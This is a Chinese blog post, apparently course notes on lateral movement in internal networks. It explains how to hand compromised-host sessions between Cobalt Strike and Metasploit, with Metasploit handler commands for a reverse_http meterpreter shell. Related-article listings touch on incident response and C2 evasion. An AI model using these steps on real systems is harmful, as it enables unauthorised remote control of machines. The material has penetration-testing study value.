72内网安全-域横向CS&MSF联动及应急响应知识

最新推荐文章于 2024-06-19 14:26:06 发布
最新推荐文章于 2024-06-19 14:26:06 发布
阅读量541 收藏 8
点赞数 4
分类专栏: web安全学习笔记 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/san3144393495/article/details/135327872
版权

拿到才行,拿不到就是多余的

案例一MSF&CobaltStrike 联动 Shell 

有一些功能可能cs或者msf强大一些,他们两个可以相互调用,在真实情况下也是可以cs和msf同时启动的,

cs移交给msf

.创建Foreign监听器

“Listeners”“Add”,“Name”填“msf”(可随便填),“Payload”选“Foreign HTTP”,“HTTP Host(Stager)”填msf的IP地址,“HTTP Port(Stager)”端口自己设定 

协议不够的时候可以添加插件,

2.MSF监听模块设置对应地址端口

选择监听模块

    use exploit/multi/handler

设置payload,注意与CS保持一致

    set payload windows/meterpreter/reverse_http

设置地址端口,其中地址可以不设或为0.0.0.0,意为任意地址,或者设为msf的IP地址(与CS保持一致);端口一定要保持一致

    set lhost 0.0.0.0

    set lport 6677

检查设置

    show options

执行

    exploit 

3.CS执行Spawn选择监听器

选择需要反弹shell的电脑,右键“Spawn”,选择刚才生成的监听器

稍等可在MSF上看见反弹结果,如果没有请检查网络 

然后选择自己想反弹的主机的shell。

会话就弹出来了

msf移交给cs

CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线

我们的目的就是反弹到cs刚刚生成的监听器,我们要返回s4,就是那个5566端口的

进入相关模块,设置对应的东西,ip,端口,s4等等

ip设置为刚刚cs的ip监听的端口就可以了,运行,cs等待上线

就完成了上线

ping

an

上线之叁
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3605
横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
72-72.渗透测试-MSF图形界面Viper.mp4
05-10
72-72.渗透测试-MSF图形界面Viper.mp4
内网安全-横向CS&MSF联动应急响应初识
xhscxj的博客
03-25 4037
案例1:MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器 MSF->CS CS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线 use exploit/windows/local/payload_inject 首先准备一台外网的服务器,安装上csmsfcs会话反弹到msf上 本地连接cs,目标cs上线后,创建监听 msf处..
72天-内网安全-横向 CS&MSF 联动应急响应
MCTSOG的博客
04-27 2711
思维导图 内网渗透 待续 应急响应 演示案例: MSF&CobaltStrike 联动 Shell (待续) 应急响应 攻击者可能拿到了哪些权限,攻击可能发生在哪个部分,从最可能的开始排查 可疑文件看文件有没有毒,有没有外部链接 结合攻击指搭建平台的漏洞 WEB 攻击应急响应朔源-后门,日志 故事回顾:某客户反应自己的网站首页出现篡改,请求支援 分析:涉及的攻击面,涉及的操作权限,涉及的攻击意图,涉及的攻击方式 思路1:利用日志定位修改时间基数,将前时间进行攻击分析,后时间进行操作分析 思路2
内网-横向CS&MSF联动应急响应初识
mingyqf的博客
11-24 902
内网-横向CS&MSF联动应急响应初识 本课重点: 案例1:MSF&CobaltStrike联动Shell 案例2:WEB攻击应急响应朔源-后门,日志 案例3:WIN系统攻击应急响应朔源-后门,日志,流量 案例1:MSF&CobaltStrike联动Shell 为什么要进行联动?因为csmsf经常相互调用,有一些功能cs强一点,有一些可能msf强一点,所以在渗透测试的时候经常要切换!所以我们需要学习如何在csmsf、powershell之间进行会话委派。powersh
72 内网安全-横向CS&MSF联动应急响应初识
wangluoanquan111的博客
03-28 824
我们后面学的,第一个是要把运维技巧学到,因为合格的应急响应分析员,它必定是个运维,有些日志开启,日志的储存还是需要了解,因为很多情况下,我们要分析出日志,日志是最常见的,要从日志里面找到攻击的行踪,还有一种是后门分析,各种杀毒软件的应用,我们都要会,平台的、流量分析,就是抓流量,还有各种各样的东西,因为很多攻击会产生在路由机和交换器上面,都有可能。[在这里插入图片描述](https://img-
p72 内网安全-横向 CS&MSF 联动应急响应初识
weixin_43263566的博客
05-08 669
内网安全-横向 CS&MSF 联动应急响应初识
内网安全横向CS&MSF联动应急响应初始
_Co1a
09-23 1971
MSF&Cobaltstrike联动shell WEB攻击应急响应溯源-后门,日志 WIN系统攻击应急响应溯源-后门,日志,流量 临时看CTF如何进对应 演示案例: • MSF&CobaltStrike联动Shell • WEB攻击应急响应朔源-后门,日志 • WIN系统攻击应急响应朔源-后门,日志,流量 • 临时给大家看看学的好的怎么干对应CTF比赛 案例1-MSF&CobaltStrike联动Shell CS->MSF 创建Foreign监听器->MSF
66 内网安全-横向批量at&schtasks&impacket
山兔的博客
10-27 1112
传递攻击是建立在明文和hash值的一个获取基础上的攻击,也是在内网里面常见协议的攻击,这篇文章主要讲at我们现在讲的话是围绕webserver被入侵,他有一个相当外网接口,进去之后,通过webserver来实现渗透其它的主机加上这个控,
第一章 声现象考点及知识点.
07-27
第一章 声现象考点及知识点 努力消化掉这些知识就可以过关鸟
CVE-2019-0708RDP MSF攻击套件.rar
11-14
CVE-2019-0708RDP MSF攻击套件亲测可用,欢迎下载
【技术分享】恶意框架样本分析-从Veil到Msf .pdf
09-05
此外,企业应建立应急响应机制,以便在发现攻击时能够快速响应和恢复。 总的来说,从Veil到Msf的过渡揭示了渗透测试工具的多样性和复杂性。了解和掌握这些框架不仅可以帮助安全专家模拟攻击,还能提升他们的防御...
74-74.渗透测试-MSF核心模块.mp4
05-10
74-74.渗透测试-MSF核心模块.mp4
在物联网设备安全中,如何有效进行固件更新管理?
2403_84237550的博客
06-17 363
• 更新后持续监控设备状态,评估更新效果,及时发现并解决更新带来的新问题。在物联网设备安全中,有效进行固件更新管理是一个关键环节,涉及到多个步骤和策略,以确保更新过程既安全又高效。• 在部署固件更新前,进行全面的安全验证和兼容性测试,确保更新包的来源可靠,未被篡改,并且不会影响设备的正常运行。• 记录每次固件更新的详细信息,包括更新时间、版本号、更新内容和操作人员等,以便追溯和审计。• 加强用户对固件更新重要性的认识,教育用户如何正确执行和验证更新,提升整体安全意识。
深信服终端安全管理系统EDR版本升级过程
最新发布
m0_64423407的博客
06-19 205
深信服终端安全管理系统EDR版本升级统一端点安全管理系统aES
如何确保数据跨交换安全、合规、可追溯性?
文件数据安全交换
06-14 556
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨交换管控平台,如飞驰云联《Ftrans MDE多区文件交换系统》,帮助企业构建统一、安全、高效的数据跨交换通道,确保数据在多地理区、多网络区、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
揭秘网络安全攻防战
waitaikong_的博客
06-17 516
随着互联网的普及,网络安全成为企业和个人关注的焦点。网络安全不仅关系到个人隐私的保护,还影响到企业的商业机密和国家的主权安全。因此,了解和掌握网络安全攻防战的相关知识,对于构建稳固的网络防御体系至关重要。网络安全攻防战是一场没有硝烟的战争,它要求我们不仅要了解当前的攻防技术,还要预见未来可能出现的新威胁,并提前做好准备。通过不断的学习和实践,我们可以提高自己在这方面的知识和技能,为保护网络安全贡献力量。未来的攻击手段将更加多样化和复杂化,防御策略也需要不断地更新和升级以应对新的挑战。
【单片机毕业设计选题24003】-基于STM32和阿里云的家庭安全监测系统
远望创客学堂
06-13 821
基于STM32和阿里云的家庭安全监测系统设计
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN前置
11-16
反朔源是指攻击者在攻击时使用了一些技术手段来隐藏攻击者的真实IP地址,使得受害者***指在网络传输过程中对数据进行加密,使得攻击者无法窃取数据或者窃取到的数据无法被解密。常见的流量加密技术包括SSL、TLS等。 CSMSF是两种常见的渗透测试工具,分别是Cobalt Strike和Metasploit Framework的缩写。这两个工具都可以用于渗透测试和红队行动。 证书指纹是指数字证书中的一个唯一标识,可以用于验证数字证书的真实性。常见的证书指纹算法包括SHA-1、SHA-256等。 C2项目是指命令与控制(Command and Control)项目,是指攻击者通过控制恶意软件的C2服务器来控制受害者的计算机。 CDN前置是指攻击者通过在攻击流量中添加CDN前置节点,来绕过一些安全防护措施,使得攻击流量更难被检测和阻止。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值